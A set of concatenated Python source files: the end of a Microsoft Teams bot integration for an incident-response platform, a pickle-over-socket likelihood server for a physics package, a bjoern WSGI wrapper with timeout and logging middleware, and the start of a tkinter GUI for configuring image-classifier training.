if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param value: Object which includes
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
demisto.debug('Processing POST query...')
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = demisto.getIntegrationContext()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
demisto.setIntegrationContext(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
def ring_user_request(call_request_data):
return http_request(method='POST', url=f'{GRAPH_BASE_URL}/v1.0/communications/calls',
json_=call_request_data)
def ring_user():
"""Rings a user on Teams.
Notes:
This is a ring only! no media plays in case the generated call is answered.
Returns:
None.
"""
bot_id = demisto.params().get('bot_id')
integration_context: dict = demisto.getIntegrationContext()
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
)
# get user to call name and id
username_to_call = demisto.args().get('username')
users: list = get_users()
user_id: str = str()
for user in users:
if username_to_call in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
user_id = user.get('id', '')
break
if not user_id:
raise ValueError(f'User {username_to_call} was not found')
call_request_data = {
"@odata.type": "#microsoft.graph.call",
"callbackUri": 'https://callback.url',
"direction": "outgoing",
"source": {
"@odata.type": "#microsoft.graph.participantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"application": {
"@odata.type": "#microsoft.graph.identity",
"id": bot_id
}
}
},
"targets": [
{
"@odata.type": "#microsoft.graph.invitationParticipantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"user": {
"@odata.type": "#microsoft.graph.identity",
"displayName": username_to_call,
"id": user_id
}
}
}
],
"requestedModalities": [
"audio"
],
"mediaConfig": {
"@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
},
"tenantId": tenant_id
}
response = ring_user_request(call_request_data)
return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
while True:
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
server = None
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('0.0.0.0', port), APP, **ssl_args)
demisto.updateModuleHealth('')
server.serve_forever()
except Exception as e:
error_message = str(e)
demisto.error(f'An error occurred in long running loop: {error_message} - {format_exc()}')
demisto.updateModuleHealth(f'An error occurred: {error_message}')
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
if server:
server.stop()
time.sleep(5)
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health,
'create-channel': create_channel_command,
'add-user-to-channel': add_user_to_channel_command,
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
'microsoft-teams-ring-user': ring_user,
'microsoft-teams-create-channel': create_channel_command,
'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
return_error(f'{str(e)} - {format_exc()}')
if __name__ == 'builtins':
main()
|
llh_server.py | #!/usr/bin/env python
"""
Server(s) for handling llh requests from a client: client passes free param
values, server sets these on its DistributionMaker, generates outputs, and
compares the resulting distributions against a reference template, returning
the llh value.
Code adapted from Dan Krause
https://gist.github.com/dankrause/9607475
see `__license__`.
"""
from __future__ import absolute_import, division, print_function
__author__ = "Dan Krause, adapted by J.L. Lanfranchi"
__license__ = """
Copyright 2017 Dan Krause
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
__all__ = [
"DFLT_HOST",
"DFLT_PORT",
"DFLT_NUM_SERVERS",
"send_obj",
"receive_obj",
"serve",
"fork_servers",
"main",
]
from argparse import ArgumentParser
from multiprocessing import cpu_count, Process
import pickle
import SocketServer
import struct
from pisa.core.distribution_maker import DistributionMaker
from pisa.core.map import MapSet
DFLT_HOST = "localhost"
DFLT_PORT = "9000"
DFLT_NUM_SERVERS = cpu_count()
class ConnectionClosed(Exception):
"""Connection closed"""
pass
def send_obj(obj, sock):
"""Send a Python object over a socket. Object is pickle-encoded as the
payload and sent preceded by a 4-byte header which indicates the number of
bytes of the payload.
Parameters
----------
sock : socket
obj : pickle-able Python object
Object to send
"""
# Turn object into a string
payload = pickle.dumps(obj)
# Create a header that says how large the payload is
header = struct.pack('!i', len(payload))
# Send header
sock.sendall(header)
# Send payload
sock.sendall(payload)
def receive_obj(sock):
"""Receive an object from a socket. Payload is a pickle-encoded object, and
header (prefixing payload) is 4-byte int indicating length of the payload.
Parameters
----------
sock : socket
Returns
-------
obj
Unpickled Python object
"""
# Get 4-byte header which tells how large the subsequent payload will be
header = sock.recv(4)
if len(header) == 0:
raise ConnectionClosed()
payload_size = struct.unpack('!i', header)[0]
# Receive the payload
payload = sock.recv(payload_size)
if len(payload) == 0:
raise ConnectionClosed()
# Payload was pickled; unpickle to recreate original Python object
obj = pickle.loads(payload)
return obj
def serve(config, ref, port=DFLT_PORT):
"""Instantiate PISA objects and run server for processing requests.
Parameters
----------
config : str or iterable thereof
Resource path(s) to pipeline config(s)
ref : str
Resource path to reference map
port : int or str, optional
"""
# Instantiate the objects here to save having to do this repeatedly
dist_maker = DistributionMaker(config)
ref = MapSet.from_json(ref)
# Define server as a closure such that it captures the above-instantiated objects
class MyTCPHandler(SocketServer.BaseRequestHandler):
"""
The request handler class for our server.
It is instantiated once per connection to the server, and must override
the handle() method to implement communication to the client.
See SocketServer.BaseRequestHandler for documentation of args.
"""
def handle(self):
try:
param_values = receive_obj(self.request)
except ConnectionClosed:
return
dist_maker._set_rescaled_free_params(param_values) # pylint: disable=protected-access
test_map = dist_maker.get_outputs(return_sum=True)[0]
llh = test_map.llh(
expected_values=ref,
binned=False, # return sum over llh from all bins (not per-bin llh's)
)
send_obj(llh, self.request)
server = SocketServer.TCPServer((DFLT_HOST, int(port)), MyTCPHandler)
print("llh server started on {}:{}".format(DFLT_HOST, port))
server.serve_forever()
def fork_servers(config, ref, port=DFLT_PORT, num=DFLT_NUM_SERVERS):
"""Fork multiple servers for handling LLH requests. Objects are identically
configured, and ports used are sequential starting from `port`.
Parameters
----------
config : str or iterable thereof
ref : str
port : str or int, optional
num : int, optional
Defaults to number of CPUs returned by `multiple.cpu_count()`
"""
processes = []
for port_ in range(int(port), int(port) + int(num)):
kwargs = dict(config=config, ref=ref, port=str(port_))
process = Process(target=serve, kwargs=kwargs)
processes.append(process)
# Start all processes
for process in processes:
process.start()
# Wait for all processes to finish
for process in processes:
process.join()
def main(description=__doc__):
"""Parse command line arguments"""
parser = ArgumentParser(description=description)
parser.add_argument(
"--config",
nargs="+",
help="""Resource location of a pipeline config; repeat --config for
multiple pipelines"""
)
parser.add_argument("--ref", help="Resource location of reference (truth) map")
parser.add_argument("--port", default=DFLT_PORT)
parser.add_argument(
"--num",
default=1,
type=int,
help="Number of servers to fork (>= 1); if set to 1, no forking occurs",
)
args = parser.parse_args()
kwargs = vars(args)
num = kwargs.pop("num")
if num == 1:
serve(**kwargs)
else:
fork_servers(num=num, **kwargs)
if __name__ == "__main__":
main()
|
bjoern_wrapper.py | #!/usr/bin/env python
import argparse
import sys
import bjoern
import importlib
import signal
import datetime
import time
import os
import threading
import mflog
import mfutil
LOGGER = mflog.get_logger("bjoern_wrapper")
def get_wsgi_application(path):
if len(path.split(':')) != 2:
LOGGER.warning("main_arg must follow module.submodule:func_name")
sys.exit(1)
module_path, func_name = path.split(':')
mod = importlib.import_module(module_path)
try:
return getattr(mod, func_name)
except Exception:
LOGGER.warning("can't find: %s func_name in module: %s" % (
func_name, mod))
sys.exit(1)
class TimeoutWsgiMiddlewareException(Exception):
pass
class TimeoutWsgiMiddleware(object):
def __init__(self, app, timeout, hard_timeout=None):
self.app = app
self.timeout = timeout
if hard_timeout is None:
self.hard_timeout = timeout + 1
else:
self.hard_timeout = hard_timeout
self.started = None
if self.hard_timeout > 0:
x = threading.Thread(target=self.hard_timeout_handler)
x.daemon = True
x.start()
def hard_timeout_handler(self):
now = datetime.datetime.now
while True:
if self.started:
if (now() - self.started).total_seconds() > self.hard_timeout:
LOGGER.warning("Request (hard) Timeout => SIGKILL")
# Self-Kill
mfutil.kill_process_and_children(os.getpid())
time.sleep(1)
def signal_timeout_handler(self, signum, frame):
LOGGER.warning("Request (soft) Timeout => HTTP/504")
raise TimeoutWsgiMiddlewareException("soft timeout")
def __call__(self, environ, start_response):
if self.hard_timeout > 0:
self.started = datetime.datetime.now()
iterable = None
if self.timeout > 0:
signal.signal(signal.SIGALRM, self.signal_timeout_handler)
signal.alarm(self.timeout)
soft_timeout_exc_info = None
try:
# see http://blog.dscpl.com.au/2012/10/
# obligations-for-calling-close-on.html
iterable = self.app(environ, start_response)
for data in iterable:
yield data
except TimeoutWsgiMiddlewareException:
soft_timeout_exc_info = sys.exc_info()
finally:
self.started = None
if self.timeout > 0:
signal.alarm(0)
if hasattr(iterable, 'close'):
iterable.close()
if soft_timeout_exc_info:
response_headers = [('Content-Type', 'text/plain')]
start_response("504 Gateway Time-out", response_headers,
soft_timeout_exc_info)
return
class MflogWsgiMiddleware(object):
def __init__(self, app, raise_exception=False, debug=False):
self.app = app
self.raise_exception = raise_exception
self.debug = debug
if self.debug:
mflog.set_config("DEBUG")
def __call__(self, environ, start_response):
if "HTTP_X_REQUEST_ID" in environ:
request_id = environ["HTTP_X_REQUEST_ID"]
os.environ["MFSERV_CURRENT_REQUEST_ID"] = request_id
iterable = None
try:
# see http://blog.dscpl.com.au/2012/10/
# obligations-for-calling-close-on.html
iterable = self.app(environ, start_response)
for data in iterable:
yield data
if hasattr(iterable, 'close'):
iterable.close()
except Exception:
if hasattr(iterable, 'close'):
iterable.close()
LOGGER.exception("uncatched exception")
if self.raise_exception:
raise
output = b"HTTP/500 Internal Server Error"
response_headers = [('Content-Type', 'text/plain'),
('Content-Length', str(len(output)))]
start_response("500 Internal Server Error", response_headers,
sys.exc_info())
yield output
def main():
parser = argparse.ArgumentParser(description="bjoern wrapper")
parser.add_argument("main_arg", help="wsgi application path")
parser.add_argument("unix_socket", help="unix socket to listen path")
parser.add_argument("--timeout", default=60, type=int,
help="one request execution timeout (in seconds)")
parser.add_argument("--debug", action="store_true",
help="if set, debug exceptions in browser (do not use "
"in production!)")
parser.add_argument("--debug-evalex", action="store_true",
help="if set, you can interactively debug your app in "
"your brower (never use it in production!)")
args = parser.parse_args()
wsgi_app = get_wsgi_application(args.main_arg)
try:
os.unlink(args.unix_socket)
except Exception:
pass
try:
app = MflogWsgiMiddleware(
TimeoutWsgiMiddleware(wsgi_app, args.timeout), args.debug,
args.debug)
if args.debug:
try:
from werkzeug.debug import DebuggedApplication
app = DebuggedApplication(app, evalex=args.debug_evalex,
pin_security=False)
except ImportError:
LOGGER.warning(
"can't import werkzeug, maybe you need to "
"install metwork-mfext-layer-python%i_devtools "
"package ?", int(os.environ['METWORK_PYTHON_MODE']))
LOGGER.debug("process start")
bjoern.run(app, 'unix:%s' % args.unix_socket, listen_backlog=10000)
except KeyboardInterrupt:
LOGGER.debug("process (normal) shutdown")
except Exception:
LOGGER.exception("uncatched exception")
try:
os.remove(args.unix_socket)
except Exception:
pass
if __name__ == '__main__':
main()
|
app.py | import os
import re
import math
import sys
import shutil
import json
import traceback
import PIL.Image as PilImage
import threading
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
from tkinter import filedialog
from constants import *
from config import ModelConfig, OUTPUT_SHAPE1_MAP, NETWORK_MAP, DataAugmentationEntity, PretreatmentEntity
from make_dataset import DataSets
from predict_testing import Predict
from trains import Trains
from category import category_extract, SIMPLE_CATEGORY_MODEL
from gui.utils import LayoutGUI
from gui.data_augmentation import DataAugmentationDialog
from gui.pretreatment import PretreatmentDialog
class Wizard:
job: threading.Thread
current_task: Trains
is_task_running: bool = False
data_augmentation_entity = DataAugmentationEntity()
pretreatment_entity = PretreatmentEntity()
def __init__(self, parent: tk.Tk):
self.layout = {
'global': {
'start': {'x': 15, 'y': 20},
'space': {'x': 15, 'y': 25},
'tiny_space': {'x': 5, 'y': 10}
}
}
self.parent = parent
self.parent.iconbitmap(Wizard.resource_path("resource/icon.ico"))
self.current_project: str = ""
self.project_root_path = "./projects"
if not os.path.exists(self.project_root_path):
os.makedirs(self.project_root_path)
self.parent.title('Image Classification Wizard Tool based on Deep Learning')
self.parent.resizable(width=False, height=False)
self.window_width = 815
self.window_height = 700
self.layout_utils = LayoutGUI(self.layout, self.window_width)
screenwidth = self.parent.winfo_screenwidth()
screenheight = self.parent.winfo_screenheight()
size = '%dx%d+%d+%d' % (
self.window_width,
self.window_height,
(screenwidth - self.window_width) / 2,
(screenheight - self.window_height) / 2
)
self.parent.bind('<Button-1>', lambda x: self.blank_click(x))
# ============================= Menu 1 =====================================
self.menubar = tk.Menu(self.parent)
self.data_menu = tk.Menu(self.menubar, tearoff=False)
self.help_menu = tk.Menu(self.menubar, tearoff=False)
self.system_menu = tk.Menu(self.menubar, tearoff=False)
self.edit_var = tk.DoubleVar()
self.memory_usage_menu = tk.Menu(self.menubar, tearoff=False)
self.memory_usage_menu.add_radiobutton(label="50%", variable=self.edit_var, value=0.5)
self.memory_usage_menu.add_radiobutton(label="60%", variable=self.edit_var, value=0.6)
self.memory_usage_menu.add_radiobutton(label="70%", variable=self.edit_var, value=0.7)
self.memory_usage_menu.add_radiobutton(label="80%", variable=self.edit_var, value=0.8)
self.menubar.add_cascade(label="System", menu=self.system_menu)
self.system_menu.add_cascade(label="Memory Usage", menu=self.memory_usage_menu)
self.data_menu.add_command(label="Data Augmentation", command=lambda: self.popup_data_augmentation())
self.data_menu.add_command(label="Pretreatment", command=lambda: self.popup_pretreatment())
self.data_menu.add_separator()
self.data_menu.add_command(label="Clear Dataset", command=lambda: self.clear_dataset())
self.menubar.add_cascade(label="Data", menu=self.data_menu)
self.help_menu.add_command(label="About", command=lambda: self.popup_about())
self.menubar.add_cascade(label="Help", menu=self.help_menu)
self.parent.config(menu=self.menubar)
# ============================= Group 1 =====================================
self.label_frame_source = ttk.Labelframe(self.parent, text='Sample Source')
self.label_frame_source.place(
x=self.layout['global']['start']['x'],
y=self.layout['global']['start']['y'],
width=790,
height=150
)
# 训练集源路径 - 标签
self.dataset_train_path_text = ttk.Label(self.parent, text='Training Path', anchor=tk.W)
self.layout_utils.inside_widget(
src=self.dataset_train_path_text,
target=self.label_frame_source,
width=90,
height=20
)
# 训练集源路径 - 输入控件
self.source_train_path_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.layout_utils.next_to_widget(
src=self.source_train_path_listbox,
target=self.dataset_train_path_text,
width=600,
height=50,
tiny_space=True
)
self.source_train_path_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.source_train_path_listbox)
)
self.listbox_scrollbar(self.source_train_path_listbox)
# 训练集源路径 - 按钮
self.btn_browse_train = ttk.Button(
self.parent, text='Browse', command=lambda: self.browse_dataset(DatasetType.Directory, RunMode.Trains)
)
self.layout_utils.next_to_widget(
src=self.btn_browse_train,
target=self.source_train_path_listbox,
width=60,
height=24,
tiny_space=True
)
# 验证集源路径 - 标签
label_edge = self.layout_utils.object_edge_info(self.dataset_train_path_text)
widget_edge = self.layout_utils.object_edge_info(self.source_train_path_listbox)
self.dataset_validation_path_text = ttk.Label(self.parent, text='Validation Path', anchor=tk.W)
self.dataset_validation_path_text.place(
x=label_edge['x'],
y=widget_edge['edge_y'] + self.layout['global']['space']['y'] / 2,
width=90,
height=20
)
# 验证集源路径 - 输入控件
self.source_validation_path_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.layout_utils.next_to_widget(
src=self.source_validation_path_listbox,
target=self.dataset_validation_path_text,
width=600,
height=50,
tiny_space=True
)
self.source_validation_path_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.source_validation_path_listbox)
)
self.listbox_scrollbar(self.source_validation_path_listbox)
# 训练集源路径 - 按钮
self.btn_browse_validation = ttk.Button(
self.parent, text='Browse', command=lambda: self.browse_dataset(DatasetType.Directory, RunMode.Validation)
)
self.layout_utils.next_to_widget(
src=self.btn_browse_validation,
target=self.source_validation_path_listbox,
width=60,
height=24,
tiny_space=True
)
# ============================= Group 2 =====================================
self.label_frame_neu = ttk.Labelframe(self.parent, text='Neural Network')
self.layout_utils.below_widget(
src=self.label_frame_neu,
target=self.label_frame_source,
width=790,
height=120,
tiny_space=False
)
# 最大标签数目 - 标签
self.label_num_text = ttk.Label(self.parent, text='Label Num', anchor=tk.W)
self.layout_utils.inside_widget(
src=self.label_num_text,
target=self.label_frame_neu,
width=65,
height=20,
)
# 最大标签数目 - 滚动框
self.label_num_spin = ttk.Spinbox(self.parent, from_=1, to=12)
self.label_num_spin.set(1)
self.layout_utils.next_to_widget(
src=self.label_num_spin,
target=self.label_num_text,
width=50,
height=20,
tiny_space=True
)
# 图像通道 - 标签
self.channel_text = ttk.Label(self.parent, text='Channel', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.channel_text,
target=self.label_num_spin,
width=50,
height=20,
tiny_space=False
)
# 图像通道 - 下拉框
self.comb_channel = ttk.Combobox(self.parent, values=(3, 1), state='readonly')
self.comb_channel.current(0)
self.layout_utils.next_to_widget(
src=self.comb_channel,
target=self.channel_text,
width=38,
height=20,
tiny_space=True
)
# 卷积层 - 标签
self.neu_cnn_text = ttk.Label(self.parent, text='CNN Layer', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.neu_cnn_text,
target=self.comb_channel,
width=65,
height=20,
tiny_space=False
)
# 卷积层 - 下拉框
self.comb_neu_cnn = ttk.Combobox(self.parent, values=[_.name for _ in CNNNetwork], state='readonly')
self.comb_neu_cnn.current(0)
self.layout_utils.next_to_widget(
src=self.comb_neu_cnn,
target=self.neu_cnn_text,
width=80,
height=20,
tiny_space=True
)
# 循环层 - 标签
self.neu_recurrent_text = ttk.Label(self.parent, text='Recurrent Layer', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.neu_recurrent_text,
target=self.comb_neu_cnn,
width=95,
height=20,
tiny_space=False
)
# 循环层 - 下拉框
self.comb_recurrent = ttk.Combobox(self.parent, values=[_.name for _ in RecurrentNetwork], state='readonly')
self.comb_recurrent.current(0)
self.layout_utils.next_to_widget(
src=self.comb_recurrent,
target=self.neu_recurrent_text,
width=112,
height=20,
tiny_space=True
)
self.comb_recurrent.bind("<<ComboboxSelected>>", lambda x: self.auto_loss(x))
# 循环层单元数 - 标签
self.units_num_text = ttk.Label(self.parent, text='UnitsNum', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.units_num_text,
target=self.comb_recurrent,
width=60,
height=20,
tiny_space=False
)
# 循环层单元数 - 下拉框
self.units_num_spin = ttk.Spinbox(self.parent, from_=16, to=512, increment=16, wrap=True)
self.units_num_spin.set(64)
self.layout_utils.next_to_widget(
src=self.units_num_spin,
target=self.units_num_text,
width=55,
height=20,
tiny_space=True
)
# 损失函数 - 标签
self.loss_func_text = ttk.Label(self.parent, text='Loss Function', anchor=tk.W)
self.layout_utils.below_widget(
src=self.loss_func_text,
target=self.label_num_text,
width=85,
height=20,
tiny_space=True
)
# 损失函数 - 下拉框
self.comb_loss = ttk.Combobox(self.parent, values=[_.name for _ in LossFunction], state='readonly')
self.comb_loss.current(0)
self.layout_utils.next_to_widget(
src=self.comb_loss,
target=self.loss_func_text,
width=101,
height=20,
tiny_space=True
)
# 优化器 - 标签
self.optimizer_text = ttk.Label(self.parent, text='Optimizer', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.optimizer_text,
target=self.comb_loss,
width=60,
height=20,
tiny_space=False
)
# 优化器 - 下拉框
self.comb_optimizer = ttk.Combobox(self.parent, values=[_.name for _ in Optimizer], state='readonly')
self.comb_optimizer.current(0)
self.layout_utils.next_to_widget(
src=self.comb_optimizer,
target=self.optimizer_text,
width=88,
height=20,
tiny_space=True
)
# 学习率 - 标签
self.learning_rate_text = ttk.Label(self.parent, text='Learning Rate', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.learning_rate_text,
target=self.comb_optimizer,
width=85,
height=20,
tiny_space=False
)
# 学习率 - 滚动框
self.learning_rate_spin = ttk.Spinbox(self.parent, from_=0.00001, to=0.1, increment='0.0001')
self.learning_rate_spin.set(0.001)
self.layout_utils.next_to_widget(
src=self.learning_rate_spin,
target=self.learning_rate_text,
width=67,
height=20,
tiny_space=True
)
# Resize - 标签
self.resize_text = ttk.Label(self.parent, text='Resize', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.resize_text,
target=self.learning_rate_spin,
width=36,
height=20,
tiny_space=False
)
# Resize - 输入框
self.resize_val = tk.StringVar()
self.resize_val.set('[150, 50]')
self.resize_entry = ttk.Entry(self.parent, textvariable=self.resize_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.resize_entry,
target=self.resize_text,
width=60,
height=20,
tiny_space=True
)
# Size - 标签
self.size_text = ttk.Label(self.parent, text='Size', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.size_text,
target=self.resize_entry,
width=30,
height=20,
tiny_space=False
)
# Size - 输入框
self.size_val = tk.StringVar()
self.size_val.set('[-1, -1]')
self.size_entry = ttk.Entry(self.parent, textvariable=self.size_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.size_entry,
target=self.size_text,
width=60,
height=20,
tiny_space=True
)
# 类别 - 标签
self.category_text = ttk.Label(self.parent, text='Category', anchor=tk.W)
self.layout_utils.below_widget(
src=self.category_text,
target=self.loss_func_text,
width=72,
height=20,
tiny_space=True
)
# 类别 - 下拉框
self.comb_category = ttk.Combobox(self.parent, values=(
'CUSTOMIZED',
'NUMERIC',
'ALPHANUMERIC',
'ALPHANUMERIC_LOWER',
'ALPHANUMERIC_UPPER',
'ALPHABET_LOWER',
'ALPHABET_UPPER',
'ALPHABET',
'ARITHMETIC',
'FLOAT',
'CHS_3500',
'ALPHANUMERIC_CHS_3500_LOWER'
), state='readonly')
self.comb_category.current(1)
self.comb_category.bind("<<ComboboxSelected>>", lambda x: self.comb_category_callback(x))
self.layout_utils.next_to_widget(
src=self.comb_category,
target=self.category_text,
width=225,
height=20,
tiny_space=True
)
# 类别 - 自定义输入框
self.category_val = tk.StringVar()
self.category_val.set('')
self.category_entry = ttk.Entry(self.parent, textvariable=self.category_val, justify=tk.LEFT, state=tk.DISABLED)
self.layout_utils.next_to_widget(
src=self.category_entry,
target=self.comb_category,
width=440,
height=20,
tiny_space=False
)
# ============================= Group 3 =====================================
self.label_frame_train = ttk.Labelframe(self.parent, text='Training Configuration')
self.layout_utils.below_widget(
src=self.label_frame_train,
target=self.label_frame_neu,
width=790,
height=60,
tiny_space=True
)
# 任务完成标准 - 准确率 - 标签
self.end_acc_text = ttk.Label(self.parent, text='End Accuracy', anchor=tk.W)
self.layout_utils.inside_widget(
src=self.end_acc_text,
target=self.label_frame_train,
width=85,
height=20,
)
# 任务完成标准 - 准确率 - 输入框
self.end_acc_val = tk.DoubleVar()
self.end_acc_val.set(0.95)
self.end_acc_entry = ttk.Entry(self.parent, textvariable=self.end_acc_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.end_acc_entry,
target=self.end_acc_text,
width=56,
height=20,
tiny_space=True
)
# 任务完成标准 - 平均损失 - 标签
self.end_cost_text = ttk.Label(self.parent, text='End Cost', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.end_cost_text,
target=self.end_acc_entry,
width=60,
height=20,
tiny_space=False
)
# 任务完成标准 - 平均损失 - 输入框
self.end_cost_val = tk.DoubleVar()
self.end_cost_val.set(0.5)
self.end_cost_entry = ttk.Entry(self.parent, textvariable=self.end_cost_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.end_cost_entry,
target=self.end_cost_text,
width=58,
height=20,
tiny_space=True
)
# 任务完成标准 - 循环轮次 - 标签
self.end_epochs_text = ttk.Label(self.parent, text='End Epochs', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.end_epochs_text,
target=self.end_cost_entry,
width=72,
height=20,
tiny_space=False
)
# 任务完成标准 - 循环轮次 - 输入框
self.end_epochs_spin = ttk.Spinbox(self.parent, from_=0, to=10000)
self.end_epochs_spin.set(2)
self.layout_utils.next_to_widget(
src=self.end_epochs_spin,
target=self.end_epochs_text,
width=50,
height=20,
tiny_space=True
)
# 训练批次大小 - 标签
self.batch_size_text = ttk.Label(self.parent, text='Train BatchSize', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.batch_size_text,
target=self.end_epochs_spin,
width=90,
height=20,
tiny_space=False
)
# 训练批次大小 - 输入框
